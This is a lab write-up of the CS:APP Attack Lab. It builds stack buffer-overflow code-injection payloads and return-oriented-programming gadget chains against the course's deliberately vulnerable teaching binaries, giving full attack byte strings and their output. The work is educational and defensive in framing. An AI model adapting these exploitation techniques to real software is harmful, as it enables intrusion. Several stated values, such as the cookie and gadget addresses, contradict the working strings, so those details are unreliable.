[CSAPP] Attack Lab Code Injection and ROP

Introduction#

Experiment corresponding chapters: 3.10.3 & 3.10.4
Experiment content: Generate five different ways to attack two programs with security vulnerabilities
Experiment handout: http://csapp.cs.cmu.edu/3e/attacklab.pdf
Experiment gains:

Learn about different attack methods for buffer overflow
Learn how to write safer programs and what features operating systems and compilers provide to ensure program safety
Understand the stack and parameter passing mechanism of x86-64 programs
Familiarize with debugging tools like GDB and OBJDUMP

Foreword#

Our attack targets are the two vulnerable executable programs, CTARGET and RTARGET, both of which read strings from standard input. The function is defined as follows:

unsigned getbuf(){
	char buf[BUFFER_SIZE];
	Gets(buf);
	return 1;
}

As we can see, the function allocates a space of size BUFFER_SIZE on the stack. When the length of the input string exceeds this size, we can modify unexpected stack space, such as the return address, thus launching an attack.
Experiment Overview

Part I: Code Injection Attacks#

In the first three phases, we will use code injection to attack CTARGET. The stack position of this program remains consistent with each run, and the data on the stack can be viewed as executable code.

Level 1#

In phase one, we do not need to inject any instructions; we only need to modify the return address to redirect the program. The getbuf function in CTARGET is called by the test function:

void test() {
	int val;
	val = getbuf();
	printf("No exploit. Getbuf returned 0x%x\n", val);
}

Normally, getbuf will return to test after execution and print the information, but we want to change this behavior to execute touch1:

void touch1() {
	vlevle = 1;
	printf("Touch1!: You called touch1()\n");
	validate(1);
	exit(0);
}

Let's take a look at the assembly code of getbuf:

00000000004017a8 <getbuf>:
  4017a8:	48 83 ec 28          	sub    $0x28,%rsp
  4017ac:	48 89 e7             	mov    %rsp,%rdi
  4017af:	e8 8c 02 00 00       	call   401a40 <Gets>
  4017b4:	b8 01 00 00 00       	mov    $0x1,%eax
  4017b9:	48 83 c4 28          	add    $0x28,%rsp
  4017bd:	c3                   	ret    
  4017be:	90                   	nop
  4017bf:	90                   	nop

The following diagram shows the organization of the stack when getbuf is executed. The program reduces the stack pointer by 0x28, allocating 40 bytes on the stack, with the character array buf located at the top of the stack.

So we only need to input 40 bytes of blank characters, followed by 8 bytes of the target address to overwrite the original return address. By consulting the disassembled code, we find the address of the touch1 function:

00000000004017c0 <touch1>

Thus, our attack string is:

#phase1.txt

00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
c0 17 40 00 00 00 00 00

Successfully cracked, executing with -q can cancel communication with the CMU server.

❯ ./hex2raw < ./phase1/phase1.txt | ./ctarget -q
Cookie: 0x59b997fa
Type string:Touch1!: You called touch1()
Valid solution for level 1 with target ctarget
PASS: Would have posted the following:
        user id bovik
        course  15213-f15
        lab     attacklab
        result  1:PASS:0xffffffff:ctarget:1:00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 C0 17 40 00 00 00 00 00

Level 2#

Phase two requires inserting a small amount of code into the attack string, with the goal of executing touch2:

void touch2(unsigned val) {
	vlevel = 2; /* Part of validation protocol */
	if (val == cookie) {
		printf("Touch2!: You called touch2(0x%.8x)\n", val);
		validate(2);
	} else {
		printf("Misfire: You called touch2(0x%.8x)\n", val);
		fail(2);
	}
	exit(0);
}

Compared to touch1, touch2 has an additional unsigned parameter cookie, the required value is in cookie.txt, which is 0x59b997fa.
Assembly:

00000000004017ec <touch2>:
  4017ec:	48 83 ec 08          	sub    $0x8,%rsp
  4017f0:	89 fa                	mov    %edi,%edx
  4017f2:	c7 05 e0 2c 20 00 02 	movl   $0x2,0x202ce0(%rip)        # 6044dc <vlevel>
  4017f9:	00 00 00 
  4017fc:	3b 3d e2 2c 20 00    	cmp    0x202ce2(%rip),%edi        # 6044e4 <cookie>
  401802:	75 20                	jne    401824 <touch2+0x38>
  401804:	be e8 30 40 00       	mov    $0x4030e8,%esi
  401809:	bf 01 00 00 00       	mov    $0x1,%edi
  40180e:	b8 00 00 00 00       	mov    $0x0,%eax
  401813:	e8 d8 f5 ff ff       	call   400df0 <__printf_chk@plt>
  401818:	bf 02 00 00 00       	mov    $0x2,%edi
  40181d:	e8 6b 04 00 00       	call   401c8d <validate>
  401822:	eb 1e                	jmp    401842 <touch2+0x56>
  401824:	be 10 31 40 00       	mov    $0x403110,%esi
  401829:	bf 01 00 00 00       	mov    $0x1,%edi
  40182e:	b8 00 00 00 00       	mov    $0x0,%eax
  401833:	e8 b8 f5 ff ff       	call   400df0 <__printf_chk@plt>
  401838:	bf 02 00 00 00       	mov    $0x2,%edi
  40183d:	e8 0d 05 00 00       	call   401d4f <fail>
  401842:	bf 00 00 00 00       	mov    $0x0,%edi
  401847:	e8 f4 f5 ff ff       	call   400e40 <exit@plt>

The value of cookie is passed in %rdi, so the steps we need to execute are:

Store 0x69b997fa in %rdi
Call touch2
We can place the instructions for these two steps at the beginning of the attack string, and then change bytes 41-48 of the attack string to the address A, which is the lowest address of %rsp-0x28 in getbuf. This way, when getbuf returns, it will execute the above two steps at address A. The stack after loading the attack string is shown in the following diagram:

Now we get the actual value of A by using GDB to set a breakpoint after moving the stack pointer in getbuf and print the value of %rsp:

❯ gdb ctarget
(gdb) b *0x4017af
(gdb) run -q
(gdb) p /x $rsp
$1 = 0x5561dc78

Then we obtain the machine code for the attack steps, first writing it in assembly form:

movq $0x59b997fa, %rdi   # Store cookie in %rdi
pushq $0x4017ec          # Jump to touch2
ret

Then use clang to assemble and objdump to disassemble:

❯ clang -c phase2.s & objdump -d phase2.o > phase2_dump.s

We get the following content:

0000000000000000 <.text>:
   0: 48 c7 c7 fa 97 b9 59    mov    $0x59b997fa,%rdi
   7: 68 ec 17 40 00          push   $0x4017ec
   c: c3                      ret

So we can get the attack string:

48 c7 c7 fa 97 b9 59 68
ec 17 40 00 c3 00 00 00    #   Attack instructions
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
78 dc 61 55 00 00 00 00    #   Address of attack instructions, i.e., A

Successfully cracked:

❯ ./hex2raw < ./phase2/phase2.txt | ./ctarget -q
Cookie: 0x59b997fa
Type string:Touch2!: You called touch2(0x59b997fa)
Valid solution for level 2 with target ctarget
PASS: Would have posted the following:
        user id bovik
        course  15213-f15
        lab     attacklab
        result  1:PASS:0xffffffff:ctarget:2:48 C7 C7 FA 97 B9 59 68 EC 17 40 00 C3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 DC 61 55 00 00 00 00

Level 3#

Phase three is still a code injection attack. Compared to phase two, the unsigned number cookie is now passed as a string. The target program to execute touch3 is as follows:

/* Compare string to hex representation of unsigned value */
int hexmatch(unsigned val, char *sval) {
	char cbuf[110];
	/* Make position of check string unpredictable */
	char *s = cbuf + random() % 100;
	sprintf(s, "%.8x", val);
	return strncmp(sval, s, 9) == 0;
}

void touch3(char *sval) {
	vlevel = 3;     /* Part of validation protocol */
	if (hexmatch(cookie, sval)) {
		printf("Touch3!: You called touch3(\"%s\")\n", sval);
		validate(3);
	} else {
		printf("Misfire: You called touch3(\"%s\")\n", sval);
		fail(3);
	}
	exit(0);
}

The hexmatch function compares the input string with cookie. The overall idea is similar to phase two, but there are two points to note:

The cookie is passed as a string and needs to be converted to ASCII code and stored on the stack.
When calling getbuf and hexmatch, there will be four push operations before strcmp, so we need to pay attention to the storage position of the string to avoid being overwritten.
The stack after inputting the attack string is as follows:

Write the attack instructions in assembly form:

movq $0x5561dca8, %rdi  # Address where cookie string is stored (A+0x30)
pushq $0x4018fa         # Address of touch3
ret

Assemble and disassemble to get the machine code:

0000000000000000 <.text>:
   0: 48 c7 c7 a8 dc 61 55    mov    $0x5561dca8,%rdi
   7: 68 fa 18 40 00          push   $0x4018fa
   c: c3                      ret

Construct the attack string:

48 c7 c7 a8 dc 61 55 68
fa 18 40 00 c3 00 00 00     #    Attack instructions
00 00 00 00 00 00 00 00     <-|
00 00 00 00 00 00 00 00       |  These four lines will be overwritten
00 00 00 00 00 00 00 00       |  
78 dc 61 55 00 00 00 00     <-|- Address of attack instructions
35 39 62 39 39 37 66 61     #    ASCII code of cookie 
00 00 00 00 00 00 00 00     #    \0

Successfully cracked:

❯ ./hex2raw < ./phase3/phase3.txt | ./ctarget -q
Cookie: 0x59b997fa
Type string:Touch3!: You called touch3("59b997fa")
Valid solution for level 3 with target ctarget
PASS: Would have posted the following:
        user id bovik
        course  15213-f15
        lab     attacklab
        result  1:PASS:0xffffffff:ctarget:3:48 C7 C7 A8 DC 61 55 68 FA 18 40 00 C3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 DC 61 55 00 00 00 00 35 39 62 39 39 37 66 61 00 00 00 00 00 00 00 00

Part II: Return-Oriented Programming#

Using buffer overflow for code injection attacks is too dangerous, so people have used some techniques to defend against them. In the last two phases, we will attack RTARGET, which uses the following two techniques:

Stack randomization: The position of the stack changes with each run, making it impossible to attack the stack address of the string, i.e., the address A used above.
Restricting executable code regions: Marking the contents saved in the stack as non-executable, so even if we can jump to the attack string, it will not run due to a segmentation fault.
Fortunately, some clever people have found a solution—Return-Oriented Programming (ROP).

The principle is to concatenate the code segments of the program itself to perform the attack. Each small part during concatenation is called a gadget, and each gadget contains several instructions and ends with 0x3c (the ret instruction).
Let’s look at an example, which is a snippet of C code from the RTARGET program:

void setval_210(unsigned *p) {
	*p = 3347663060U;
}

And the corresponding assembly instructions:

0000000000400f15 <setval_210>:
400f15: c7 07 d4 48 89 c7        movl $0xc78948d4,(%rdi)
400f1b: c3                       retq

The 48 49 c7 segment can be encoded as movq %rax, %rdi, and c3 can be encoded as ret. So if we jump to 0x400f118, the functionality of this code is:

movq %rax, %rdi
ret

This is a gadget. Once we clarify the behavior of the attack, we can find suitable gadgets and combine them to form a code chain for the attack.

Level 2#

Phase four will use ROP to accomplish the same task as phase two, passing the cookie value to touch2. We have broken it down into two steps:

Store 0x69b997fa in %rdi
Call touch2
At the same time, the problem requires using only the first eight registers (%rax-%rdi) and only using instructions between start_farm and mid_farm as gadgets. After careful searching, we find that we can change the attack process to the following two gadgets:

popq %rax            (58)
movq %rax %rdi       (48 89 c7)

Determine the address of each gadget:

00000000004019ca <getval_280>:
  4019ca: b8 29 58 90 c3        mov    $0xc3905829,%eax
  4019cf: c3                    ret

00000000004019a0 <addval_273>:
  4019a0: 8d 87 48 89 c7 c3     lea    -0x3c3876b8(%rdi),%eax
  4019a6: c3                    ret

The addresses can be taken as 0x4019cc and 0x4019a3, where 90 encoded as nop can be ignored, so our attack string can be:

00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00         # First 0x28 bytes
cc 19 40 00 00 00 00 00         # Return address, pointing to popq %rax
fa 97 b9 59 00 00 00 00         # Value to pop (cookie)
a2 19 40 00 00 00 00 00         # Pointing to movq
ec 17 40 00 00 00 00 00         # Pointing to touch2

Successfully cracked:

❯ ./hex2raw < ./phase4/phase4.txt | ./rtarget -q
Cookie: 0x59b997fa
Type string:Touch2!: You called touch2(0x59b997fa)
Valid solution for level 2 with target rtarget
PASS: Would have posted the following:
        user id bovik
        course  15213-f15
        lab     attacklab
        result  1:PASS:0xffffffff:rtarget:2:00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 CC 19 40 00 00 00 00 00 FA 97 B9 59 00 00 00 00 A2 19 40 00 00 00 00 00 EC 17 40 00 00 00 00 00

Level 3#

In phase five, we will use ROP to crack the task of phase three, which is to pass the address of the cookie string to touch3. Therefore, we need to know the value of %rsp to calculate the address of the string. We find that there is a different function after mid_farm:

00000000004019d6 <add_xy>:
  4019d6: 48 8d 04 37           lea    (%rdi,%rsi,1),%rax
  4019da: c3                    ret

Its function is to add %rdi and %rsi, so we can store the relative offset of %rsp and the string address, allowing us to calculate the string address. The specific process is as follows:

1. movq %rsp %rdi
2. popq %rax          # Pop the offset stored in the stack
3. movq %rax %rsi
4. movq %rax %rdi     # Use the calculated result as a parameter

For step 1, we did not find a direct step, so we continue to break it down into two steps:

movq %rsp %rax (48 89 e0)
movq %rax %rdi (48 89 c7)

0000000000401a03 <addval_190>:
  401a03: 8d 87 41 48 89 e0     lea    -0x1f76b7bf(%rdi),%eax
  401a09: c3                    ret

00000000004019a0 <addval_273>:
  4019a0: 8d 87 48 89 c7 c3     lea    -0x3c3876b8(%rdi),%eax
  4019a6: c3                    ret

For step 2, popq %rax encodes to 58, we find:

00000000004019a7 <addval_219>:
  4019a7:	8d 87 51 73 58 90    	lea    -0x6fa78caf(%rdi),%eax
  4019ad:	c3

For step 3, we also did not find a direct step, so we can only break it down into three steps:

movq %eax %edx (89 c2)
movq %edx %ecx (89 d1)
movq %ecx %esi (89 ce)
We find the following gadgets:

00000000004019db <getval_481>:
  4019db: b8 5c 89 c2 90        mov    $0x90c2895c,%eax
  4019e0: c3                    ret
  
0000000000401a33 <getval_159>:
  401a33:	b8 89 d1 38 c9       	mov    $0xc938d189,%eax
  401a38:	c3 

0000000000401a11 <addval_436>:
  401a11: 8d 87 89 ce 90 90     lea    -0x6f6f3177(%rdi),%eax
  401a17: c3                    ret

Note that 38 c9 is functionally equivalent to nop, so we can ignore it. Therefore, our attack string can be:

00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00     # Keep empty
06 1a 40 00 00 00 00 00     # movq %rsp %rax
a2 19 40 00 00 00 00 00     # movq %rax %rdi <-- Get %rsp value
ab 19 40 00 00 00 00 00     # popq %rax
48 00 00 00 00 00 00 00     # Offset
dd 19 40 00 00 00 00 00     # movl %eax %edx
34 1a 40 00 00 00 00 00     # movl %edx %ecx
13 1a 40 00 00 00 00 00     # movl %ecx %esi
d6 19 40 00 00 00 00 00     # add_xy
a2 19 40 00 00 00 00 00     # movq %rax %rdi
fa 18 40 00 00 00 00 00     # touch3
35 39 62 39 39 37 66 61     # Cookie string
00 00 00 00 00 00 00 00

The cookie string is in the position of the %rsp value, with an offset of 8*9=72=0x48. Note that, like phase 3, do not place the cookie in lines 2 to 5 of the attack string, as it will be overwritten. The last question is also completed:

❯ ./hex2raw < ./phase5/phase5.txt | ./rtarget -q
Cookie: 0x59b997fa
Type string:Touch3!: You called touch3("59b997fa")
Valid solution for level 3 with target rtarget
PASS: Would have posted the following:
        user id bovik
        course  15213-f15
        lab     attacklab
        result  1:PASS:0xffffffff:rtarget:3:00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 1A 40 00 00 00 00 00 A2 19 40 00 00 00 00 00 AB 19 40 00 00 00 00 00 48 00 00 00 00 00 00 00 DD 19 40 00 00 00 00 00 34 1A 40 00 00 00 00 00 13 1A 40 00 00 00 00 00 D6 19 40 00 00 00 00 00 A2 19 40 00 00 00 00 00 FA 18 40 00 00 00 00 00 35 39 62 39 39 37 66 61 00 00 00 00 00 00 00 00

Epilogue#

Since the above two methods (stack randomization and restricting executable code regions) cannot effectively defend against ROP, what other methods do we have? In fact, there is one: stack smashing detection. We find that stack smashing often occurs when exceeding the boundaries of local buffers, so we can store a special canary value between any local buffer in the stack frame and the stack state. This value is randomly generated during the program's execution, and before the function returns, the program checks whether the canary value has changed. If it has, the program aborts abnormally.
Recent versions of GCC will determine whether a function is susceptible to stack overflow attacks and automatically insert such overflow detection, resulting in minimal performance loss but with good effectiveness.